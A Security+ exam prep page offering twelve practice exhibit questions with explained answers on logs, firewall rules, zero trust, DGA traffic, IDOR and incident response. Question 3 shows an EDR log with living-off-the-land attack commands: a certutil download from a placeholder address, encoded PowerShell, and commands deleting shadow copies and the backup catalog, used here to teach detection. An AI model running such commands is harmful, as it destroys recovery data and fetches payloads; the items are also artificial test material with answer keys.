SASERÁ Academy
Security+ · performance-based practice

Security+ PBQ practice: read the exhibit, make the call

Twelve free exhibit questions in the style of performance-based items: firewall rules, SIEM and EDR logs, DLP alerts, VPN profiles, backup designs and incident response order. Every option is explained.

  • Logs & rule tables
  • Incident response order
  • Choose TWO items
Security+ SY0-701 exam prep course cover

How to read a PBQ exhibit fast

Read the question first. Know what you are looking for before you read twelve log lines.

Find the anomaly. In logs, look for the line that breaks the pattern: a new source address, a time that does not fit, one success after many failures, an unusual process parent.

Rules are read top-down. In firewall tables the first matching rule wins, so a broad allow or deny above a specific rule decides the outcome.

Map it to the objective. Ask which Security+ concept the exhibit is testing: an attack type, a control, a design principle or a response step. The options usually differ on exactly that concept.

12 free Security+ exhibit questions

These are extra questions, not taken from the course. Click an option to answer; the explanation under every option appears as soon as you do.

0 of 12 answered · 0 correctEvery option is explained after you answer
General Security ConceptsQuestion 1 of 12

Review the zero trust access log entry:

user=jlee
MFA=passed
device=unmanaged laptop
posture=failed (no EDR agent)
resource=HR-portal
decision=DENY
enforced by=PEP-07

Which statement BEST explains the outcome?

  • The log shows MFA=passed. The denial was not caused by the authentication challenge.
  • The enforcement point applies the verdict from the policy decision point. It does not make the decision on its own.
  • Correct. MFA passed, but the unmanaged device failed posture, and the policy denied access on that basis.
  • The request never reached the portal. The log shows it was denied at PEP-07 before any application sign-in.
Why it matters: Zero trust decisions combine identity with context such as device health. Passing MFA is necessary but not sufficient.
General Security ConceptsQuestion 2 of 12

Review the TLS client debug output:

chain=valid
validity dates=OK
hostname=match
CRL download=timeout after 10s
revocation policy=soft-fail
connection=established

What is the MOST significant security risk?

  • The output shows chain=valid. The trust path is complete.
  • The output shows hostname=match. There is no name mismatch.
  • Correct. The CRL could not be fetched and the soft-fail policy allowed the connection, so revocation was never actually checked.
  • The output shows validity dates=OK. The certificate is within its validity period.
Why it matters: Soft-fail revocation checking treats an unreachable CRL or OCSP responder as good. An attacker who can block the lookup can then present a revoked certificate.
Threats, Vulnerabilities & MitigationsQuestion 3 of 12

Review the EDR events on a file server:

01:10 certutil.exe -urlcache -f http://198.51.100.20/a.txt
01:12 powershell.exe -enc SQBFAFgA...
01:15 vssadmin.exe delete shadows /all /quiet
01:16 wbadmin delete catalog -quiet

No unknown executables were written to disk. Which conclusion is BEST?

  • Correct. Native binaries were abused to download a payload, run encoded commands and destroy recovery points, which is typical pre-ransomware living off the land.
  • Administrators do not normally delete every shadow copy and the backup catalog at 1 a.m. after an encoded script.
  • Worms self-propagate between hosts; these events show hands-on commands on one server with native tools.
  • Bloatware is unwanted preinstalled software and would not issue commands to delete recovery data.
Why it matters: Attackers increasingly use built-in tools such as certutil, PowerShell and vssadmin to blend in; deleting shadow copies and backup catalogs is a classic step before encryption.
Threats, Vulnerabilities & MitigationsQuestion 4 of 12

Review the log:

02:14 login fail user=admin src=203.0.113.9
02:14 login fail user=jsmith src=203.0.113.9
02:15 login fail user=pnguyen src=203.0.113.9
02:15 login fail user=kbrown src=203.0.113.9
02:16 login ok user=tdavis src=203.0.113.9

Every attempt used the password Winter2026!. Which attack is this?

  • Brute force tries many passwords against one account; here one password is tried against many accounts.
  • Credential replay reuses a captured credential or token for a specific account, not guesses across users.
  • A dictionary attack on one user tries many words against that account; these attempts span many users.
  • Correct. A single common password tried against many different usernames is password spraying.
Why it matters: Spraying tries one likely password across many accounts, staying below per-account lockout thresholds while still finding weak passwords.
Threats, Vulnerabilities & MitigationsQuestion 5 of 12

Review the DNS log from one workstation:

query xk2p9qlz7a.com NXDOMAIN
query mb81vtr0qe.net NXDOMAIN
query zq7hy1c2kw.org NXDOMAIN (hundreds per hour)
query p4nb0x8rty.com resolved 203.0.113.77

Which conclusion is MOST likely?

  • Cache poisoning plants false answers for real names; here the queried names themselves are random.
  • People mistype real brand names, not hundreds of random ten-character strings per hour.
  • Correct. Hundreds of random names failing until one resolves is the typical footprint of DGA-based command and control.
  • A misconfigured forwarder would fail real domains, not produce random strings that no one would type.
Why it matters: Domain generation algorithms let malware try many random-looking domains until one registered by the attacker resolves, making command and control hard to block by list.
Threats, Vulnerabilities & MitigationsQuestion 6 of 12

Review the API log for user id 2231:

GET /api/accounts/2231/statements 200
GET /api/accounts/2232/statements 200
GET /api/accounts/2233/statements 200
GET /api/accounts/2234/statements 200

Accounts 2232 to 2234 belong to other customers. Which issue does this BEST indicate?

  • Correct. A normal customer reached other customers' data at the same privilege level by changing the object ID.
  • Vertical escalation means gaining higher rights, such as admin; this user only reached peers' data.
  • CSRF uses another user's browser; this user is making the requests directly.
  • The user presents their own valid session; the flaw is the missing ownership check.
Why it matters: Accessing peers' data at the same privilege level is horizontal escalation, often caused by insecure direct object references where the server fails to check ownership.
Security ArchitectureQuestion 7 of 12

Review the container deployment settings:

privileged: true
hostPath mount: / (read-write)
runAsUser: 0
hostNetwork: true

Which risk is the MOST serious?

  • CPU use is controlled by resource limits, which these settings do not address. Host takeover is the far greater risk.
  • Nothing in these settings refers to the image source, so registry trust cannot be judged from them.
  • Correct. Root in a privileged container with the host filesystem mounted read-write can easily escape to the host.
  • hostNetwork does not make the service unreachable. It removes network isolation, which adds to the escape risk.
Why it matters: Containers share the host kernel. Privileged mode, root user and a writable root filesystem mount remove the isolation that normally contains a compromise.
Security ArchitectureQuestion 8 of 12

Review the perimeter firewall rules. The web server 172.16.10.5 sits in the screened subnet and the database 10.1.5.20 sits on the internal network:

Rule 1 ALLOW TCP 443 ANY to 172.16.10.5
Rule 2 ALLOW TCP 1433 ANY to 10.1.5.20
Rule 3 DENY ANY ANY

Which change BEST reduces risk without breaking the application?

  • Moving to plain HTTP weakens web security and leaves the database exposure untouched.
  • Correct. Restricting the source to the web server keeps the application working and blocks direct internet access to SQL.
  • Placing the deny-all rule first would block all traffic, including the legitimate web service.
  • Removing Rule 1 takes the website offline and leaves the database exposed.
Why it matters: Only the web tier should reach the database. Allowing any source to reach SQL exposes the internal database directly to the internet.
Security ArchitectureQuestion 9 of 12

Review the backup design for an order database:

Full backup Sunday 01:00
Incremental backup daily at 01:00
Backups stored offsite
Business RPO: 15 minutes

Which change BEST meets the RPO?

  • Nightly full backups still leave up to 24 hours of orders unprotected.
  • Differentials change what a restore needs, not how often data is captured, so the gap stays at 24 hours.
  • Another copy of the weekly full backup adds location resilience, not a better recovery point.
  • Correct. Shipping the transaction log every 15 minutes limits data loss to the RPO.
Why it matters: The recovery point objective sets the most data the business can lose. Daily backups can lose up to 24 hours, so changes must be captured at least every 15 minutes.
Security OperationsQuestion 10 of 12

A DLP console shows:

user=mrivera
action=upload
destination=personal-drive.example
file=Q3_payroll.xlsx
match=SSN pattern x412
policy action=monitor

Which change BEST prevents this from recurring?

  • Correct. Blocking stops the upload instead of just recording it.
  • The rule already matched; a threshold change does not stop the upload.
  • Allow-listing the site would permit exactly the behavior to prevent.
  • A summary is after the fact and still lets the data leave.
Why it matters: A DLP rule in monitor mode only records violations. Enforcement requires a blocking action once the rule is tuned and trusted.
Security OperationsQuestion 11 of 12

An incident response trainer lists these steps:

A) Lessons learned
B) Containment
C) Detection and analysis
D) Recovery
E) Eradication

Which order is correct?

  • Containment must come before eradication to stop the spread first.
  • You cannot contain an incident before detecting and analyzing it.
  • Correct. Detection, containment, eradication, recovery, then lessons learned.
  • Recovery before eradication risks restoring systems that are still compromised.
Why it matters: After preparation, the team detects and analyzes, contains, eradicates, recovers and then reviews what happened.
Security OperationsQuestion 12 of 12 · choose two

A workstation baseline requires:

guest account disabled, host firewall on, full-disk encryption on, and no standard users in the local Administrators group. A scan of LAPTOP-22 returns: Guest=Disabled
Firewall=On (all profiles)
BitLocker=Off
LocalAdmins=Domain Admins, jdoe

Which two findings need remediation? (Choose TWO.)

  • Domain Admins membership is the normal domain default and the baseline does not prohibit it.
  • An enabled firewall on all profiles meets the baseline.
  • Correct. The baseline requires full-disk encryption.
  • Correct. A standard user with local admin rights breaks the baseline.
Why it matters: Compare each result with the baseline. Only settings that differ from the required state need remediation.

PBQ FAQ

What are PBQs on the Security+ exam?

Performance-based questions ask you to do something rather than recall a fact: read a log, fix firewall rules, order incident response steps or match controls to scenarios. They usually appear at the start of the exam.

How many PBQs are on Security+?

CompTIA does not publish an exact number. Candidates commonly report a small handful at the start of the exam, alongside up to 90 questions in total.

Should I answer PBQs first?

Many candidates flag PBQs and return to them after the multiple-choice questions, so a long simulation does not eat the time they need for the rest of the exam. Either way, practice reading exhibits quickly.

Are these the real PBQs?

No. They are original practice items written from the public CompTIA objectives in a PBQ style: an exhibit to read and a decision to make. Real exam content is protected.

More practice: free SY0-701 questions · free SY0-801 questions · SY0-701 vs SY0-801